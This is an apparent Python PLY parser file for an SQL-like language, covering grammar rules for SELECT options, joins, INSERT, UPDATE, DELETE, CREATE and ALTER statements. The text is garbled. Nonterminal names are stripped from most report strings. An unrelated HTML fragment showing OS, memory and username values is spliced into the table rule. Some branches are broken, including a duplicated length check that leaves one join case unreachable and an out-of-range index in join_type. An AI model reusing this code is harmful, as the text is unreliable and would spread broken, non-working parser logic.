::= \\ tDistinct \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_where_clause_opt(t):\n '''where_clause_opt : where_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"where_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"where_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref\n t[0] = t[1]\n \n else:\n t[0] = None\n\n\ndef p_group_clause_opt(t):\n '''group_clause_opt : group_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"group_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"group_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_having_clause_opt(t):\n '''having_clause_opt : having_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"having_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"having_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_order_by_opt(t):\n '''order_by_opt : ORDER BY col_name\n | empty'''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"order_by_opt\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tOrder tBy \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_limit_opt(t):\n '''limit_opt : LIMIT ENTERO\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tLimit tEntero \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_offset_opt(t):\n '''offset_opt : OFFSET ENTERO\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tOffset tEntero \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_table(t):\n '''table : ID \n | ID AS TEXTO\n | ID AS ID\n '''\n\n if len(t) == 2:\n graph_ref = graph_node(str(str(t[1])))\n addCad(\"**\\
    OS \" + str(os) + \"
    Memory \" + str(memory) + \"
    Username \" + str(uname) + \"
    \n \n
    ** ::= tIdentificador \")\n t[0] = Table(t[1], t[1], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n ##### \n else:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2]) + \" \" + str(t[3])))\n addCad(\"**\\
    ** ::= tIdentificador tAs tTexto \")\n t[0] = Table(t[1], t[3], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n ##### \n\n\ndef p_table0(t):\n '''table : PARA stm_select PARC\n | PARA stm_select PARC AS TEXTO\n | PARA stm_select PARC AS ID\n '''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"table\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\
    ** ::= '(' \\ ')' \")\n t[0] = Table(None, None, t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n else:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"table\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\
    ** ::= '(' \\ ')' tAs tTexto \")\n t[0] = Table(t[5], t[5], t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_insert(t):\n '''stm_insert : INSERT INTO ID insert_ops'''\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"stm_insert\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tInsert tInto tIdentifier \\ \")\n token_insert = t.slice[1]\n t[0] = InsertInto(t[3], t[4].column_list, t[4].values_list, token_insert.lineno, token_insert.lexpos, graph_ref)\n # print(t)\n\n\ndef p_insert_ops(t):\n '''insert_ops : column_list_param_opt VALUES PARA exp_list PARC\n | column_list_param_opt stm_select'''\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [1])\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n\n graph_ref = graph_node(str(\"insert_ops\"), [t[1], t[2], t[3], lista, t[5]], childsProduction)\n addCad(\"**\\** ::= \\ tValues '(' \\ ')' \")\n token_ops = t.slice[2]\n t[0] = InsertItem(t[1].val if t[1] is not None else None, t[4], token_ops.lineno, token_ops.lexpos, graph_ref)\n else:\n token_ops = t.slice[1]\n childsProduction = addNotNoneChild(t, [1, 2])\n graph_ref = graph_node(str(\"insert_ops\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= \\ \\ \")\n t[0] = InsertItem(t[1].val, t[2], 0, 0, graph_ref)\n\n\ndef p_table_list(t):\n '''table_list : table_list COMA table_ref \n | table_ref'''\n if len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"table_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' \\ ')' \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n else:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"table_list\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ ')' \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_table_ref(t):\n '''table_ref : table NATURAL join_type JOIN table\n | table join_type JOIN table\n | table'''\n\n if len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 3, 5])\n graph_ref = graph_node(str(\"table_ref\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\
    tNatural \\ tJoin \\
    \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 2, 4])\n graph_ref = graph_node(str(\"table_ref\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= \\
    \\ tJoin \\
    \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"table_ref\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\
    \")\n t[1].graph_ref = graph_ref\n t[0] = t[1]\n\n\ndef p_join_type(t):\n '''join_type : outer_join_type \n | outer_join_type OUTER\n '''\n\n if len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"join_type\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 3:\n childsProduction = addNotNoneChild(t, [1, 2, 4])\n graph_ref = graph_node(str(\"join_type\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= \\ tOuter \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_join_type0(t):\n '''join_type : INNER\n '''\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tInner \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_outer_join_type(t):\n '''outer_join_type : LEFT\n | RIGHT\n | FULL'''\n token = t.slice[1]\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.type))\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##\n\n\ndef p_list_names(t):\n '''list_names : list_names COMA names AS TEXTO\n | list_names COMA names AS ID\n | list_names COMA names\n | POR\n '''\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"list_names\"), [lista, t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tNames tAs tTexto \")\n t[3].alias = t[5]\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n elif len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"list_names\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tNames \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n elif len(t) == 2:\n\n graph_ref = graph_node(str(\"tPor\"), [t[1]], [])\n addCad(\"**\\** ::= tPor \")\n t[0] = [Names(True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)]\n\n\ndef p_list_names0(t):\n '''list_names : names AS TEXTO\n | names AS ID\n | names'''\n\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"list_names\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ tAs tTexto \")\n t[1].graph_ref = graph_ref\n t[1].alias = t[3]\n t[0] = [t[1]]\n\n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"list_names\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_names(t):\n '''names : expression\n | time_ops\n | case_clause\n '''\n token = t.slice[1]\n cadena = str(token.type)\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"names\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\<\" + cadena.upper() + \" >\")\n t[0] = Names(False, t[1], None, t[1].line, t[1].column, graph_ref)\n\n\ndef p_names1(t):\n '''names : GREATEST PARA exp_list PARC\n | LEAST PARA exp_list PARC\n | COUNT PARA expression PARC\n | COUNT PARA POR PARC\n | AVG PARA expression PARC\n | MAX PARA expression PARC\n | MIN PARA expression PARC\n | SUM PARA expression PARC\n '''\n token = t.slice[1]\n token_str = str(token.type).upper()\n if token_str == 'GREATEST' or token_str == 'LEAST':\n lista = None\n childsProduction = []\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"names\"), 
[t[1], t[2], lista, t[4]], childsProduction)\n addCad(\"**\\** ::= \" + token_str + \" '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n else:\n childsProduction = []\n graph_ref = graph_node(str(\"names\"), [t[1], t[2], t[4]], childsProduction)\n addCad(\"**\\** ::= \" + token_str + \" '(' \\ ')' \")\n if token_str == 'COUNT':\n NodoC = Count(t[3], '*' == t[3], token.lineno, token.lexpos, graph_ref)\n t[0] = Names(False, NodoC, None, token.lineno, token.lexpos, graph_ref)\n elif token_str == 'AVG':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'MAX':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'MIN':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'SUM':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_group_clause(t):\n '''group_clause : GROUP BY PARA group_list PARC\n '''\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"group_clause\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= tGroup tBy '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n\n\ndef p_group_list(t):\n '''group_list : group_list COMA col_name\n | col_name'''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [1, 3])\n graph_ref = graph_node(str(\"group_list\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"group_list\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_having_clause(t):\n '''having_clause : HAVING logicExpression'''\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"having_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tHaving \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_case_clause(t):\n '''case_clause : CASE case_inner ELSE expression\n | CASE case_inner'''\n if len(t) == 5:\n childsProduction = addNotNoneChild(t, [2, 4])\n graph_ref = graph_node(str(\"case_clause\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tCase \\ tElse \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 3:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"case_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tCase \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ####\n\n\ndef p_case_inner(t):\n '''case_inner : case_inner WHEN logicExpression THEN expression\n | WHEN logicExpression THEN expression'''\n if len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 3, 5])\n graph_ref = graph_node(str(\"case_inner\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ tWhen \\ tThen \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 5:\n childsProduction = addNotNoneChild(t, [2, 4])\n graph_ref = graph_node(str(\"case_inner\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tWhen \\ tThen \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ####\n\n\ndef p_time_ops(t):\n '''time_ops : EXTRACT PARA ops_from_ts FECHA_HORA PARC\n | DATE_PART PARA TEXTO COMA INTERVAL TEXTO PARC\n | TIMESTAMP TEXTO\n | CURRENT_DATE\n | CURRENT_TIME\n '''\n if len(t) == 6:\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n 
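# NOTE: this branch matches input like EXTRACT(YEAR FROM TIMESTAMP '2020-01-01'), folding it into DateAST(t[4], t[3].option); the field token is recovered by p_ops_from_ts below.\n 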
addCad(\"**\\** ::= tExtract '(' \\ tFechaHora ')' \")\n t[0] = DateAST(t[4], t[3].option, token.lineno, token.lexpos, graph_ref)\n elif len(t) == 8:\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7]], [])\n addCad(\"**\\** ::= tDate_part '(' tText ',' tINTERVAL tText ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 3:\n token = t.slice[1]\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2]], [])\n addCad(\"**\\** ::= tTimestemp tText\")\n t[0] = Now(token.lineno, token.lexpos, graph_ref)\n else:\n token = t.slice[1]\n if token.type == 'CURRENT_DATE':\n graph_ref = graph_node(str(\"time_ops\"), [t[1]], [])\n addCad(\"**\\** ::= tCurrent_date\")\n t[0] = NowDate(token.lineno, token.lexpos, graph_ref)\n elif token.type == 'CURRENT_TIME':\n graph_ref = graph_node(str(\"time_ops\"), [t[1]], [])\n addCad(\"**\\** ::= tCurrent_time\")\n t[0] = NowTime(token.lineno, token.lexpos, graph_ref)\n\n\ndef p_ops_from_ts(t):\n '''ops_from_ts : YEAR FROM TIMESTAMP\n | HOUR FROM TIMESTAMP\n | MINUTE FROM TIMESTAMP\n | SECOND FROM TIMESTAMP\n | MONTH FROM TIMESTAMP\n | DAY FROM TIMESTAMP\n '''\n token = t.slice[1]\n cadena = str(token.type)\n graph_ref = graph_node(str(\"ops_from_ts\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= \" + cadena + \" tFrom tTimestamp \")\n t[0] = DateAST_2(token.type, token.lineno, token.lexpos, graph_ref)\n\n\ndef p_column_list_param_opt(t):\n '''column_list_param_opt : PARA column_list PARC \n | empty'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"column_list_param_opt\"), [t[1], lista, t[3]], childsProduction)\n addCad(\"**\\** ::= '(' \\ ')' \")\n t[0] = upNodo(t[2], 0, 0, graph_ref)\n else:\n t[0] = None\n\n\ndef p_column_list(t):\n '''column_list : column_list COMA ID\n | ID'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"column_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \")\n token_id = t.slice[3]\n t[1][0].graph_ref = graph_ref\n t[1].append(Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref))\n t[0] = t[1]\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n token_id = t.slice[1]\n t[0] = [Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref)]\n\n\ndef p_stm_update(t):\n '''stm_update : UPDATE ID SET update_list where_clause\n | UPDATE ID SET update_list'''\n token_up = t.slice[1]\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [5])\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_update\"), [t[1], t[2], t[3], lista, t[5]], childsProduction)\n addCad(\"**\\** ::= tUpdate tIdentifier tSet \\ \\ \")\n t[0] = Update(t[2], t[4], t[5], token_up.lineno, token_up.lexpos, graph_ref)\n else:\n lista = None\n childsProduction = []\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_update\"), [t[1], t[2], t[3], lista], childsProduction)\n addCad(\"**\\** ::= tUpdate tIdentifier tSet \\ \")\n t[0] = Update(t[2], t[4], None, token_up.lineno, token_up.lexpos, graph_ref)\n\n\ndef p_update_list(t):\n '''update_list : update_list COMA ID IGUAL logicExpression\n | ID IGUAL logicExpression'''\n if len(t) == 6:\n 
token_up = t.slice[3]\n lista = None\n childsProduction = addNotNoneChild(t, [5])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"update_list\"), [lista, t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier '=' \\ \")\n t[1][0].graph_ref = graph_ref\n t[1].append(UpdateItem(t[3], t[5], token_up.lineno, token_up.lexpos, graph_ref))\n t[0] = t[1]\n else:\n token_up = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"update_list\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tIdentifier '=' \\ \")\n t[0] = [UpdateItem(t[1], t[3], token_up.lineno, token_up.lexpos, graph_ref)]\n\n\n################################\n\ndef p_stm_use_db(t):\n '''stm_use_db : USE DATABASE ID\n | USE ID'''\n if len(t) == 4:\n tokenID = t.slice[3]\n graph_ref = graph_node(str(\"stm_use_db\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= tUse tDatabase tIdentifier \")\n\n IDAST = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = UseDatabase(IDAST, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n else:\n tokenID = t.slice[len(t) - 1]\n graph_ref = graph_node(str(\"stm_use_db\"), [t[1], t[2]], [])\n addCad(\"**\\** ::= tUse tIdentifier \")\n IDAST = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = UseDatabase(IDAST, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n########## >>>>>>>>>>>>>>>> STM_DELETE AND STM_ALTER <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_delete(t):\n '''stm_delete : DELETE FROM ID where_clause\n | DELETE FROM ID'''\n token_del = t.slice[1]\n if len(t) == 5:\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"stm_delete\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tDelete tFrom tIdentifier \\\")\n t[0] = Delete(t[3], t[4], token_del.lineno, token_del.lexpos, graph_ref)\n else:\n childsProduction = None\n graph_ref = graph_node(str(\"stm_delete\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tDelete tFrom tIdentifier \")\n t[0] = Delete(t[3], None, token_del.lineno, token_del.lexpos, graph_ref)\n\n\ndef p_where_clause(t):\n '''where_clause : WHERE predicateExpression'''\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"where_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tWhere \\\")\n t[0] = Where(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_create(t):\n '''stm_create : CREATE or_replace_opt DATABASE if_not_exists_opt ID owner_opt mode_opt\n | CREATE TABLE ID PARA tab_create_list PARC inherits_opt\n | CREATE TYPE ID AS ENUM PARA exp_list PARC'''\n token = t.slice[1]\n tok = t.slice[3]\n if len(t) == 8 and tok.type == \"DATABASE\":\n tokenID = t.slice[5]\n childsProduction = addNotNoneChild(t, [2, 4, 6, 7])\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7]], childsProduction)\n addCad(\"**\\** ::= tCreate \\ tDatabase tIdentifier \\ \\\")\n tvla = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = CreateDatabase(tvla, None, t[7], (True if t[2] else False), (True if t[4] else False), token.lineno,\n token.lexpos, graph_ref)\n\n elif len(t) == 8:\n lista = None\n childsProduction = addNotNoneChild(t, [7])\n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref)\n\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], lista, t[6], t[7]], childsProduction)\n addCad(\n \"
    \\n\\n**\\** ::= tCreate tTable tIdentifier '(' \\ ')' \\\")\n t[0] = CreateTable(t[3], t[7], t[5], None, token.lineno, token.lexpos,\n graph_ref) # TODO check if param check_exp is neceary and where we obtain that\n\n elif len(t) == 9:\n lista = None\n childsProduction = []\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_create\"), [t[1], t[2], t[3], t[4], t[5], t[6], lista, t[8]], childsProduction)\n addCad(\"**\\** ::= tCreate tType tIdentifier tAs tEnum '(' \\ ')' \")\n t[0] = CreateEnum(t[3], t[7], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_if__not_exist_opt(t):\n '''if_not_exists_opt : IF NOT EXISTS\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2]) + \" \" + str(t[3])))\n addCad(\"**\\** ::= tIf tNot tExists \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n # for table columns and contrainst\n\n\ndef p_tab_create_list(t):\n '''tab_create_list : tab_create_list COMA ID type nullable_opt primary_key_opt \n | ID type nullable_opt primary_key_opt'''\n if len(t) == 7:\n lista = None\n childsProduction = addNotNoneChild(t, [4, 5, 6])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"tab_create_list\"), [lista, t[2], t[3], t[4], t[5], t[6]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \\ \\ \\ \")\n TF = TableField(t.slice[3].value, t[4].val, t[4].max_size, t[5], (t[6] is not None), t.slice[3].lineno,\n t.slice[3].lexpos, graph_ref)\n t[1][0].graph_ref = graph_ref\n t[1].append(TF)\n t[0] = t[1]\n else:\n childsProduction = addNotNoneChild(t, [2, 3, 4])\n graph_ref = graph_node(str(\"tab_create__list\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ \\ \\ \")\n t[0] = [TableField(t.slice[1].value, t[2].val, t[2].max_size, t[3], (t[4] is not None), t.slice[1].lineno,\n t.slice[1].lexpos, graph_ref)]\n\n\ndef p_primary_key_opt(t):\n '''primary_key_opt : PRIMARY KEY\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tPrimary tKey \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_nullable(t):\n '''nullable : NULL\n | NOT NULL'''\n if len(t) == 2:\n graph_ref = graph_node(str(t[1]), [], [])\n addCad(\"**\\** ::= tNull \")\n t[0] = Nullable(True, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n else:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tNot tNull \")\n t[0] = Nullable(False, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_nullable_opt(t):\n '''nullable_opt : nullable\n | empty'''\n token = t.slice[1]\n if token.type == \"nullable\":\n addCad(\"**\\** ::= \")\n t[0] = t[1]\n ##### \n else:\n t[0] = None\n\n\ndef p_inherits_opt(t):\n '''inherits_opt : INHERITS PARA ID PARC\n | empty'''\n if len(t) == 5:\n graph_ref = graph_node(str(t[1] + \" \" + str(t[2]) + \" \" + str(t[3]) + \" \" + str(t[4])))\n addCad(\"**\\** ::= tInherits '(' tIdentifier ')' \")\n token = t.slice[3]\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n else:\n t[0] = None\n\n\n# owner option\ndef p_owner_opt(t):\n '''owner_opt : OWNER IGUAL ID\n | OWNER IGUAL TEXTO'''\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + t[3]))\n addCad(\"**\\** ::= tOwner '=' [tTexto | tIdentifier ] \")\n tokenID = t.slice[3]\n t[0] = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef 
p_owner_opt0(t):\n '''owner_opt : OWNER ID\n | OWNER TEXTO'''\n tokenID = t.slice[2]\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tOwner [tTexto | tIdentifier ] \")\n t[0] = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_owner_opt1(t):\n '''owner_opt : empty'''\n t[0] = None\n\n\n# mode option\ndef p_mode_opt(t):\n '''mode_opt : MODE IGUAL ENTERO'''\n tokenID = t.slice[3]\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + str(t[3])))\n addCad(\"**\\** ::= tMode '=' tEntero \")\n t[0] = Numeric(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_mode_opt1(t):\n '''mode_opt : MODE ENTERO'''\n tokenID = t.slice[2]\n graph_ref = graph_node(str(t[1] + \" \" + str(t[2])))\n addCad(\"**\\** ::= tMode tEntero \")\n t[0] = Numeric(tokenID.value, tokenID.lineno, tokenID.lexpos, graph_ref)\n\n\ndef p_mode_opt2(t):\n '''mode_opt : empty'''\n t[0] = None\n\n\n# Replace OPTION\ndef p_or_replace_opt(t):\n '''or_replace_opt : OR REPLACE\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tOr tReplace \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_stm_alter(t):\n '''stm_alter : ALTER DATABASE ID RENAME TO ID \n | ALTER DATABASE ID OWNER TO db_owner\n'''\n token_alter = t.slice[4]\n if token_alter.type == \"RENAME\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tDatabase tIdentifier tRename tTo tIdentifier \")\n t[0] = AlterDatabaseRename(t[3], t[6], token_alter.lineno, token_alter.lexpos, graph_ref)\n if token_alter.type == \"OWNER\":\n childsProduction = addNotNoneChild(t, [6])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], childsProduction)\n addCad(\"**\\** ::= tAlter tDatabase tIdentifier tOwner tTo \\ \")\n t[0] = AlterDatabaseOwner(t[3], t[6], token_alter.lineno, token_alter.lexpos, graph_ref)\n\n\ndef p_stm_alter0(t):\n '''stm_alter : ALTER TABLE ID DROP CONSTRAINT ID\n | ALTER TABLE ID DROP COLUMN ID\n'''\n token_alter = t.slice[5]\n if token_alter.type == \"CONSTRAINT\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tDrop tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n if token_alter.type == \"COLUMN\":\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tDrop tColumn tIdentifier \")\n t[0] = AlterTableDropColumn(t[3], t[6], token_alter.lineno, token_alter.lexpos, 